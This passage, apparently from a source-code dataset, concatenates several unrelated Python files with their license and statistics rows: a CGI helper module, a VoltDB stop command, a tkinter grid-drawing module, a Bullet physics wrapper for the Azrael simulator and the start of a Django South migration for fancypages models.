'''x.__init__(...) initializes x'''
self.__data = range(length)
for index in range(length):
self.__data[index] = value
def __repr__(self):
'''x.__repr__() <==> repr(x)'''
return repr(self.__data)
def __len__(self):
'''x.__len__() <==> len(x)'''
return len(self.__data)
def __getitem__(self, key):
'''x.__getitem__(y) <==> x[y]'''
return self.__data[key]
def __setitem__(self, key, value):
'''x.__setitem__(i, y) <==> x[i]=y'''
self.__data[key] = value
def __delitem__(self, key):
'''x.__delitem__(y) <==> del x[y]'''
self.__data[key] = None
def __iter__(self):
'''x.__iter__() <==> iter(x)'''
return iter(self.__data)
def __contains__(self, value):
'''x.__contains__(y) <==> y in x'''
return value in self.__data
class matrix(object):
'''matrix(rows, columns) -> new matrix
matrix(rows, columns, value) -> initialized from value'''
def __init__(self, rows, columns, value=None):
'''x.__init__(...) initializes x'''
self.__data = array(rows)
for index in range(rows):
self.__data[index] = array(columns, value)
def __repr__(self):
'''x.__repr__() <==> repr(x)'''
return repr(self.__data)
def __len__(self):
'''x.__len__() <==> len(x)'''
return len(self.__data)
def __getitem__(self, key):
'''x.__getitem__(y) <==> x[y]'''
return self.__data[key]
def __setitem__(self, key, value):
'''x.__setitem__(i, y) <==> x[i]=y'''
self.__data[key] = array(len(self.__data[key]), value)
def __delitem__(self, key):
'''x.__delitem__(y) <==> del x[y]'''
self.__data[key] = array(len(self.__data[key]))
def __iter__(self):
'''x.__iter__() <==> iter(x)'''
return iter(self.__data)
def __contains__(self, value):
'''x.__contains__(y) <==> y in x'''
for item in self.__data:
if value in item:
return True
return False
# Private Names
# =============
def main():
print 'Content-Type: text/plain'
print
print file(sys.argv[0]).read()
# Execute Main
# ============
if __name__ == '__main__':
main()
################################################################################
# Zcgi.py
################################################################################
# Name & Description
# ==================
'''Support module for use by CGI scripts.
This module provides several functions and variables
that help with printing text and accessing form data.'''
# Data & Imports
# ==============
__all__ = ['execute', 'print_html', 'print_plain', 'print_self',
'dictionary', 'string']
__version__ = '1.2'
import os
import sys
import types
# Public Names
# ============
def execute(main, exception):
'''execute(function main, str exception)
Execute main unless exception.'''
assert_type((types.FunctionType, main), (str, exception))
if exception == string:
print_self()
else:
main()
def print_html(text):
'''print_html(str text)
Print text as HTML.'''
assert_type((str, text))
print 'Content-Type: text/html'
print
print text
sys.exit(0)
def print_plain(text):
'''print_plain(str text)
Print text as plain.'''
assert_type((str, text))
print 'Content-Type: text/plain'
print
print text
sys.exit(0)
def print_self():
'''print_self()
Print __main__ as plain.'''
print 'Content-Type: text/plain'
print
print file(sys.argv[0]).read()
sys.exit(0)
# Private Names
# =============
def export():
global dictionary, string
dictionary = string = None
try:
string = os.environ['QUERY_STRING']
temp = string.replace('+', ' ').split('&')
for index in range(len(temp)):
temp[index] = temp[index].split('=')
dictionary = dict()
for parameter, value in temp:
dictionary[decode(parameter)] = decode(value)
except:
pass
def decode(string):
assert_type((str, string))
index = string.find('%')
while index != -1:
string = string[:index] + chr(int(string[index+1:index+3], 16)) + string[index+3:]
index = string.find('%', index + 1)
return string
def assert_type(*tuples):
for types, objects in tuples:
if type(objects) is not types:
raise TypeError
# Execute Conditional
# ===================
if __name__ == '__main__':
print_self()
else:
export()
|
mit
| -5,567,249,290,560,385,000
| 28.228797
| 135
| 0.512113
| false
| 3.504967
| false
| false
| false
|
eoneil1942/voltdb-4.7fix
|
lib/python/voltcli/voltdb.d/stop.py
|
1
|
1682
|
# This file is part of VoltDB.
# Copyright (C) 2008-2014 VoltDB Inc.
#
# This file contains original code and/or modifications of original code.
# Any modifications made by VoltDB Inc. are licensed under the following
# terms and conditions:
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import signal
from voltcli import utility
@VOLT.Command(
description = 'Stop a VoltDB server daemon.',
options = [
VOLT.StringOption('-H', '--host', 'host',
'HOST[:PORT] (default HOST=localhost, PORT=3021)',
default='localhost:3021'),
]
)
def stop(runner):
daemonizer = runner.create_daemonizer(description="VoltDB server")
daemonizer.stop_daemon()
|
agpl-3.0
| -6,828,493,845,769,102,000
| 40.04878
| 73
| 0.743757
| false
| 4.173697
| false
| false
| false
|
efanescent/SapidCircuits
|
World.py
|
1
|
2775
|
import Control
from tkinter.messagebox import showerror
from Window import *
from Utils import *
canvas, field, scale = None, None, None
def init(window, p_field=-1, p_scale=10):
"""using to init World with params"""
global canvas, field, scale
canvas = tk.Canvas(window, highlightthickness=0, bg='#FFF3A4')
canvas.pack(side='top', fill='both', expand=True)
field = p_field
scale = p_scale
# auto setting control
try: set_control()
except:
showerror('Error', 'Control can\'t be set')
def set_field(p_field):
"""set up field in the world"""
global field
field = p_field
def clear():
"""remove all elements from canvas"""
global canvas
canvas.delete('all')
def scale_(*args, **kwargs):
"""universal function for set/get/change scale
if arg is num - change scale
if kwarg wiz index 'set' - set scale
and then return current scale"""
global scale
for arg in args:
if isinstance(scale, (int, float)):
scale += arg
for key in kwargs:
if key == 'set':
scale = kwargs[key]
return scale
def draw():
global canvas, field, scale
if field == -1: return False
# possibly this is bad idea... idk
clear()
# redraw empty tiles
cx, cy = field.x, field.y
for col in range(int(field.height)):
for row in range(int(field.width)):
canvas.create_rectangle(cx, cy, cx+1000/scale, cy+1000/scale)
cx += (1000/scale)
cx = field.x
cy += (1000/scale)
def set_control():
"""set control..."""
canvas.master.bind_all('<Key>', Control.pressed)
def move_view(**kwargs):
for key in kwargs:
if key == 'x':
canvas.xview_scroll(int(kwargs[key]), 'units')
if key == 'y':
canvas.yview_scroll(int(kwargs[key]), 'units')
class Field:
"""class contains tiles"""
def __init__(self, sx, sy, width, height):
self.x = sx # start x
self.y = sy # start y
# width 'n' height in units (f.e. 2x3 = 6units or tiles)
self.width = width
self.height = height
self.tiles = dict() # no tiles, excepting empty
def add_tile(self, tx, ty, tile):
"""add tile in tiles container"""
self.tiles[tile_xy2i(tx, ty)] = tile
def get_tile(self, tx, ty):
"""return tile from tiles container"""
try:
return self.tiles[tile_xy2i(tx, ty)]
except:
return -1
def is_empty_tile(self, tx, ty):
"""return bool - tile is empty"""
try:
self.tiles[tile_xy2i(tx, ty)]
except:
return True
else:
return False
class Tile:
def __init__(self, Id):
self.ID = Id
|
mit
| 5,046,132,535,887,485,000
| 24.943925
| 73
| 0.57045
| false
| 3.641732
| false
| false
| false
|
daviddeng/azrael
|
azrael/bullet_api.py
|
1
|
21037
|
# Copyright 2014, Oliver Nagy <olitheolix@gmail.com>
#
# This file is part of Azrael (https://github.com/olitheolix/azrael)
#
# Azrael is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Azrael is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Azrael. If not, see <http://www.gnu.org/licenses/>.
"""
Provide classes to create-, modify- and query dynamic simulations. The classes
abstract away the particular physics engine (currently Bullet) used underneath.
This module is the *one and only* module that actually imports the Bullet
engine (ie the wrapper called `azBullet`). This will make it easier to swap out
Bullet for another engine at some point, should the need arise.
"""
import logging
import numpy as np
import azrael.types as types
import azrael.bullet.azBullet as azBullet
from IPython import embed as ipshell
from azrael.types import typecheck, RetVal, _RigidBodyData
from azrael.types import ConstraintMeta, ConstraintP2P, Constraint6DofSpring2
from azrael.types import CollShapeMeta, CollShapeSphere, CollShapeBox, CollShapePlane
# Convenience.
Vec3 = azBullet.Vec3
Quaternion = azBullet.Quaternion
Transform = azBullet.Transform
# Convenience.
RigidBodyData = types.RigidBodyData
class PyRigidBody(azBullet.RigidBody):
"""
Wrapper around RigidBody class.
The original azBullet.RigidBody class cannot be extended since it is a
compiled module. However, by subclassing it we get the convenience of
a pure Python class (eg adding attributes at runtime). This is transparent
to the end user.
"""
def __init__(self, ci):
super().__init__(ci)
class PyBulletDynamicsWorld():
"""
High level wrapper around the low level Bullet bindings.
"""
def __init__(self, engineID: int):
# Create a Class-specific logger.
name = '.'.join([__name__, self.__class__.__name__])
self.logit = logging.getLogger(name)
# To distinguish engines.
self.engineID = engineID
# Create a standard Bullet Dynamics World.
self.dynamicsWorld = azBullet.BulletBase()
# Disable gravity.
self.dynamicsWorld.setGravity(Vec3(0, 0, 0))
# Dictionary of all bodies.
self.rigidBodies = {}
def setGravity(self, gravity: (tuple, list)):
"""
Set the ``gravity`` in the simulation.
"""
try:
gravity = np.array(gravity, np.float64)
assert gravity.ndim == 1
assert len(gravity) == 3
except (TypeError, ValueError, AssertionError):
return RetVal(False, 'Invalid type', None)
self.dynamicsWorld.setGravity(Vec3(*gravity))
return RetVal(True, None, None)
def removeRigidBody(self, bodyIDs: (list, tuple)):
"""
Remove ``bodyIDs`` from Bullet and return the number of removed bodies.
Non-existing bodies are not counted (and ignored).
:param list bodyIDs: list of bodyIDs to remove.
:return: number of actually removed bodies.
:rtype: int
"""
cnt = 0
# Remove every body, skipping non-existing ones.
for bodyID in bodyIDs:
# Skip non-existing bodies.
if bodyID not in self.rigidBodies:
continue
# Delete the body from all caches.
del self.rigidBodies[bodyID]
cnt += 1
# Return the total number of removed bodies.
return RetVal(True, None, cnt)
def compute(self, bodyIDs: (tuple, list), dt: float, max_substeps: int):
"""
Step the simulation for all ``bodyIDs`` by ``dt``.
This method aborts immediately if one or more bodyIDs do not exist.
The ``max_substeps`` parameter tells Bullet the maximum allowed
granularity. Typiclal values for ``dt`` and ``max_substeps`` are
(1, 60).
:param list bodyIDs: list of bodyIDs for which to update the physics.
:param float dt: time step in seconds
:param int max_substeps: maximum number of sub-steps.
:return: Success
"""
# All specified bodies must exist. Abort otherwise.
try:
rigidBodies = [self.rigidBodies[_] for _ in bodyIDs]
except KeyError as err:
self.logit.warning('Body IDs {} do not exist'.format(err.args))
return RetVal(False, None, None)
# Add the body to the world and make sure it is activated, as
# Bullet may otherwise decide to simply set its velocity to zero
# and ignore the body.
for body in rigidBodies:
self.dynamicsWorld.addRigidBody(body)
body.forceActivationState(4)
# The max_substeps parameter instructs Bullet to subdivide the
# specified timestep (dt) into at most max_substeps. For example, if
# dt= 0.1 and max_substeps=10, then, internally, Bullet will simulate
# no finer than dt / max_substeps = 0.01s.
self.dynamicsWorld.stepSimulation(dt, max_substeps)
# Remove all bodies from the simulation again.
for body in rigidBodies:
self.dynamicsWorld.removeRigidBody(body)
return RetVal(True, None, None)
def applyForceAndTorque(self, bodyID, force, torque):
"""
Apply a ``force`` and ``torque`` to the center of mass of ``bodyID``.
:param int bodyID: the ID of the body to update
:param 3-array force: force applied directly to center of mass
:param 3-array torque: torque around center of mass.
:return: Success
"""
# Sanity check.
if bodyID not in self.rigidBodies:
msg = 'Cannot set force of unknown body <{}>'.format(bodyID)
self.logit.warning(msg)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert the force and torque to Vec3.
b_force = Vec3(*force)
b_torque = Vec3(*torque)
# Clear pending forces (should be cleared automatically by Bullet when
# it steps the simulation) and apply the new ones.
body.clearForces()
body.applyCentralForce(b_force)
body.applyTorque(b_torque)
return RetVal(True, None, None)
def applyForce(self, bodyID: int, force, rel_pos):
"""
Apply a ``force`` at ``rel_pos`` to ``bodyID``.
:param int bodyID: the ID of the body to update
:param 3-array force: force applied directly to center of mass
:param 3-array rel_pos: position of force relative to center of mass
:return: Success
"""
# Sanity check.
if bodyID not in self.rigidBodies:
msg = 'Cannot set force of unknown body <{}>'.format(bodyID)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert the force and torque to Vec3.
b_force = Vec3(*force)
b_relpos = Vec3(*rel_pos)
# Clear pending forces (should be cleared automatically by Bullet when
# it steps the simulation) and apply the new ones.
body.clearForces()
body.applyForce(b_force, b_relpos)
return RetVal(True, None, None)
def getRigidBodyData(self, bodyID: int):
"""
Return Body State of ``bodyID``.
This method aborts immediately if ``bodyID`` does not exists.
:param int bodyID: the ID of body for which to return the state.
:return: ``_RigidBodyData`` instances.
"""
# Abort immediately if the ID is unknown.
if bodyID not in self.rigidBodies:
msg = 'Cannot find body with ID <{}>'.format(bodyID)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Determine rotation and position.
rot = body.getCenterOfMassTransform().getRotation().topy()
pos = body.getCenterOfMassTransform().getOrigin().topy()
# Determine linear and angular velocity.
vLin = body.getLinearVelocity().topy()
vRot = body.getAngularVelocity().topy()
# Linear/angular damping factors.
axesLockLin = body.getLinearFactor().topy()
axesLockRot = body.getAngularFactor().topy()
# Bullet does not support scaling collision shape (actually, it does,
# but it is frought with problems). Therefore, we may thus copy the
# 'scale' value from the body's meta data.
scale = body.azrael[1].scale
# Bullet will never modify the Collision shape. We may thus use the
# information from the body's meta data.
cshapes = body.azrael[1].cshapes
# Construct a new _RigidBodyData structure and add it to the list
# that will eventually be returned to the caller.
out = _RigidBodyData(scale, body.getInvMass(),
body.getRestitution(), rot, pos, vLin, vRot,
cshapes, axesLockLin, axesLockRot, 0)
return RetVal(True, None, out)
@typecheck
def setRigidBodyData(self, bodyID: int, rbState: _RigidBodyData):
"""
Update State Variables of ``bodyID`` to ``rbState``.
Create a new body with ``bodyID`` if it does not yet exist.
:param int bodyID: the IDs of all bodies to retrieve.
:param ``_RigidBodyData`` rbState: body description.
:return: Success
"""
# Create the Rigid Body if it does not exist yet.
if bodyID not in self.rigidBodies:
self.createRigidBody(bodyID, rbState)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert rotation and position to Vec3.
rot = Quaternion(*rbState.rotation)
pos = Vec3(*rbState.position)
# Assign body properties.
tmp = azBullet.Transform(rot, pos)
body.setCenterOfMassTransform(tmp)
body.setLinearVelocity(Vec3(*rbState.velocityLin))
body.setAngularVelocity(Vec3(*rbState.velocityRot))
body.setRestitution(rbState.restitution)
body.setLinearFactor(Vec3(*rbState.axesLockLin))
body.setAngularFactor(Vec3(*rbState.axesLockRot))
# Build and assign the new collision shape, if necessary.
old = body.azrael[1]
if (old.scale != rbState.scale) or \
not (np.array_equal(old.cshapes, rbState.cshapes)):
# Create a new collision shape.
tmp = self.compileCollisionShape(bodyID, rbState)
mass, inertia, cshapes = tmp.data
del mass, inertia, tmp
# Replace the existing collision shape with the new one.
body.setCollisionShape(cshapes)
del old
# Update the mass but leave the inertia intact. This is somewhat
# awkward to implement because Bullet returns the inverse values yet
# expects the non-inverted ones in 'set_mass_props'.
if rbState.imass == 0:
# Static body: mass and inertia are zero anyway.
body.setMassProps(0, Vec3(0, 0, 0))
else:
m = rbState.imass
x, y, z = body.getInvInertiaDiagLocal().topy()
if (m < 1E-10) or (x < 1E-10) or (y < 1E-10) or (z < 1E-10):
# Use safe values if either the inertia or the mass is too
# small for inversion.
m = x = y = z = 1
else:
# Inverse mass and inertia.
x = 1 / x
y = 1 / y
z = 1 / z
m = 1 / m
# Apply the new mass and inertia.
body.setMassProps(m, Vec3(x, y, z))
# Overwrite the old RigidBodyData instance with the latest version.
body.azrael = (bodyID, rbState)
return RetVal(True, None, None)
def setConstraints(self, constraints: (tuple, list)):
"""
Apply the ``constraints`` to the specified bodies in the world.
If one or more of the rigid bodies specified in any of the constraints
do not exist then this method will abort. Similarly, it will also abort
if one or more constraints could not be constructed for whatever
reason (eg. unknown constraint name).
In any case, this function will either apply all constraints or none.
It is not possible that this function applies only some constraints.
:param list constraints: list of `ConstraintMeta` instances.
:return: Success
"""
def _buildConstraint(c):
"""
Compile the constraint `c` into the proper C-level Bullet body.
"""
# Get handles to the two bodies. This will raise a KeyError unless
# both bodies exist.
rb_a = self.rigidBodies[c.rb_a]
rb_b = self.rigidBodies[c.rb_b]
# Construct the specified constraint type. Raise an error if the
# constraint could not be constructed (eg the constraint name is
# unknown).
if c.contype.upper() == 'P2P':
tmp = ConstraintP2P(*c.condata)
out = azBullet.Point2PointConstraint(
rb_a, rb_b,
Vec3(*tmp.pivot_a),
Vec3(*tmp.pivot_b)
)
elif c.contype.upper() == '6DOFSPRING2':
t = Constraint6DofSpring2(*c.condata)
fa, fb = t.frameInA, t.frameInB
frameInA = Transform(Quaternion(*fa[3:]), Vec3(*fa[:3]))
frameInB = Transform(Quaternion(*fb[3:]), Vec3(*fb[:3]))
out = azBullet.Generic6DofSpring2Constraint(
rb_a, rb_b, frameInA, frameInB
)
out.setLinearLowerLimit(Vec3(*t.linLimitLo))
out.setLinearUpperLimit(Vec3(*t.linLimitHi))
out.setAngularLowerLimit(Vec3(*t.rotLimitLo))
out.setAngularUpperLimit(Vec3(*t.rotLimitHi))
for ii in range(6):
if not t.enableSpring[ii]:
out.enableSpring(ii, False)
continue
out.enableSpring(ii, True)
out.setStiffness(ii, t.stiffness[ii])
out.setDamping(ii, t.damping[ii])
out.setEquilibriumPoint(ii, t.equilibrium[ii])
for ii in range(3):
out.setBounce(ii, t.bounce[ii])
else:
assert False
# Return the Bullet constraint body.
return out
# Compile a list of all Bullet constraints.
try:
constraints = [ConstraintMeta(*_) for _ in constraints]
out = [_buildConstraint(_) for _ in constraints]
except (TypeError, AttributeError, KeyError, AssertionError):
return RetVal(False, 'Could not compile all Constraints.', None)
# Apply the constraints.
fun = self.dynamicsWorld.addConstraint
for c in out:
fun(c)
# All went well.
return RetVal(True, None, None)
def clearAllConstraints(self):
"""
Remove all constraints from the simulation.
:return: success
"""
# Convenience.
world = self.dynamicsWorld
# Return immediately if the world has no constraints to remove.
if world.getNumConstraints() == 0:
return RetVal(True, None, None)
# Iterate over all constraints and remove them.
for c in world.iterateConstraints():
world.removeConstraint(c)
# Verify that the number of constraints is now zero.
if world.getNumConstraints() != 0:
return RetVal(False, 'Bug: #constraints must now be zero', None)
else:
return RetVal(True, None, None)
@typecheck
def compileCollisionShape(self, bodyID: int, rbState: _RigidBodyData):
"""
Return the correct Bullet collision shape based on ``rbState``.
This is a convenience method only.
fixme: find out how to combine mass/inertia of multi body bodies.
:param int bodyID: body ID.
:param _RigidBodyData rbState: meta data to describe the body.
:return: compound shape with all the individual shapes.
:rtype: ``CompoundShape``
"""
# Create the compound shape that will hold all other shapes.
compound = azBullet.CompoundShape()
# Aggregate the total mass and inertia.
tot_mass = 0
tot_inertia = Vec3(0, 0, 0)
# Bodies with virtually no mass will be converted to static bodies.
# This is almost certainly not what the user wants but it is the only
# safe option here. Note: it is the user's responsibility to ensure the
# mass is reasonably large!
if rbState.imass > 1E-4:
rbState_mass = 1.0 / rbState.imass
else:
rbState_mass = 0
# Create the collision shapes one by one.
scale = rbState.scale
for name, cs in rbState.cshapes.items():
# Convert the input data to a CollShapeMeta tuple. This is
# necessary if the data passed to us here comes straight from the
# database because then it it is merely a list of values, not (yet)
# a named tuple.
cs = CollShapeMeta(*cs)
# Determine which CollisionShape to instantiate, scale it
# accordingly, and apply create it in Bullet.
cstype = cs.cstype.upper()
if cstype == 'SPHERE':
sphere = CollShapeSphere(*cs.csdata)
child = azBullet.SphereShape(scale * sphere.radius)
elif cstype == 'BOX':
box = CollShapeBox(*cs.csdata)
hl = Vec3(scale * box.x, scale * box.y, scale * box.z)
child = azBullet.BoxShape(hl)
elif cstype == 'EMPTY':
child = azBullet.EmptyShape()
elif cstype == 'PLANE':
# Planes are always static.
rbState_mass = 0
plane = CollShapePlane(*cs.csdata)
normal = Vec3(*plane.normal)
child = azBullet.StaticPlaneShape(normal, plane.ofs)
else:
child = azBullet.EmptyShape()
msg = 'Unrecognised collision shape <{}>'.format(cstype)
self.logit.warning(msg)
# Let Bullet compute the local inertia of the body.
inertia = child.calculateLocalInertia(rbState_mass)
# Warn about unreasonable inertia values.
if rbState_mass > 0:
tmp = np.array(inertia.topy())
if not (1E-5 < np.sqrt(np.dot(tmp, tmp)) < 100):
msg = 'Inertia = ({:.1E}, {:.1E}, {:.1E})'
self.logit.warning(msg.format(*inertia.topy()))
del tmp
# Add the collision shape at the respective position and
# rotation relative to the parent.
t = azBullet.Transform(Quaternion(*cs.rotation),
Vec3(*cs.position))
compound.addChildShape(t, child)
tot_mass += rbState_mass
tot_inertia += inertia
return RetVal(True, None, (tot_mass, tot_inertia, compound))
@typecheck
def createRigidBody(self, bodyID: int, rbState: _RigidBodyData):
"""
Create a new rigid body ``rbState`` with ``bodyID``.
:param int bodyID: ID of new rigid body.
:param _RigidBodyData rbState: State Variables of rigid body.
:return: Success
"""
# Convert rotation and position to Bullet types.
rot = Quaternion(*rbState.rotation)
pos = Vec3(*rbState.position)
# Build the collision shape.
ret = self.compileCollisionShape(bodyID, rbState)
mass, inertia, cshapes = ret.data
# Create a motion state for the initial rotation and position.
ms = azBullet.DefaultMotionState(azBullet.Transform(rot, pos))
# Instantiate the actual rigid body.
ci = azBullet.RigidBodyConstructionInfo(mass, ms, cshapes, inertia)
body = PyRigidBody(ci)
# Set additional parameters.
body.setFriction(0.1)
body.setDamping(0.02, 0.02)
body.setSleepingThresholds(0.1, 0.1)
# Attach my own admin structure to the body.
body.azrael = (bodyID, rbState)
# Add the rigid body to the body cache.
self.rigidBodies[bodyID] = body
return RetVal(True, None, None)
|
agpl-3.0
| 6,817,916,343,925,518,000
| 37.6
| 85
| 0.60327
| false
| 3.961024
| false
| false
| false
|
tangentlabs/django-oscar-fancypages
|
oscar_fancypages/fancypages/migrations/0001_initial.py
|
1
|
56653
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
depends_on = (
('assets', '0001_initial'),
('catalogue', '0009_auto__add_field_product_rating'),
('promotions', '0001_initial'),
('offer', '0001_initial'),
)
def forwards(self, orm):
# Adding model 'FancyPage'
db.create_table('fancypages_fancypage', (
('category_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['catalogue.Category'], unique=True, primary_key=True)),
('page_type', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='pages', null=True, to=orm['fancypages.PageType'])),
('keywords', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('status', self.gf('django.db.models.fields.CharField')(default=u'draft', max_length=15)),
('date_visible_start', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('date_visible_end', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
))
db.send_create_signal('fancypages', ['FancyPage'])
# Adding M2M table for field visibility_types on 'FancyPage'
db.create_table('fancypages_fancypage_visibility_types', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('fancypage', models.ForeignKey(orm['fancypages.fancypage'], null=False)),
('visibilitytype', models.ForeignKey(orm['fancypages.visibilitytype'], null=False))
))
db.create_unique('fancypages_fancypage_visibility_types', ['fancypage_id', 'visibilitytype_id'])
# Adding model 'PageType'
db.create_table('fancypages_pagetype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=128)),
('template_name', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal('fancypages', ['PageType'])
# Adding model 'VisibilityType'
db.create_table('fancypages_visibilitytype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=128, null=True, blank=True)),
))
db.send_create_signal('fancypages', ['VisibilityType'])
# Adding model 'Container'
db.create_table('fancypages_container', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.SlugField')(max_length=50, blank=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['contenttypes.ContentType'], null=True)),
('object_id', self.gf('django.db.models.fields.PositiveIntegerField')(null=True)),
))
db.send_create_signal('fancypages', ['Container'])
# Adding unique constraint on 'Container', fields ['name', 'content_type', 'object_id']
db.create_unique('fancypages_container', ['name', 'content_type_id', 'object_id'])
# Adding model 'OrderedContainer'
db.create_table('fancypages_orderedcontainer', (
('container_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.Container'], unique=True, primary_key=True)),
('display_order', self.gf('django.db.models.fields.PositiveIntegerField')()),
))
db.send_create_signal('fancypages', ['OrderedContainer'])
# Adding model 'ContentBlock'
db.create_table('fancypages_contentblock', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('container', self.gf('django.db.models.fields.related.ForeignKey')(related_name='blocks', to=orm['fancypages.Container'])),
('display_order', self.gf('django.db.models.fields.PositiveIntegerField')()),
))
db.send_create_signal('fancypages', ['ContentBlock'])
# Adding model 'TextBlock'
db.create_table('fancypages_textblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('text', self.gf('django.db.models.fields.TextField')(default='Your text goes here.')),
))
db.send_create_signal('fancypages', ['TextBlock'])
# Adding model 'TitleTextBlock'
db.create_table('fancypages_titletextblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(default='Your title goes here.', max_length=100)),
('text', self.gf('django.db.models.fields.TextField')(default='Your text goes here.')),
))
db.send_create_signal('fancypages', ['TitleTextBlock'])
# Adding model 'ImageBlock'
db.create_table('fancypages_imageblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('alt_text', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('link', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_asset', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='image_blocks', null=True, to=orm['assets.ImageAsset'])),
))
db.send_create_signal('fancypages', ['ImageBlock'])
# Adding model 'ImageAndTextBlock'
db.create_table('fancypages_imageandtextblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('alt_text', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('link', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_asset', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='image_text_blocks', null=True, to=orm['assets.ImageAsset'])),
('text', self.gf('django.db.models.fields.CharField')(default='Your text goes here.', max_length=2000)),
))
db.send_create_signal('fancypages', ['ImageAndTextBlock'])
# Adding model 'CarouselBlock'
db.create_table('fancypages_carouselblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('image_1', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_1', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_2', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_2', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_3', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_3', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_4', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_4', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_5', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_5', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_6', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_6', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_7', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_7', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_8', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_8', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_9', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_9', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
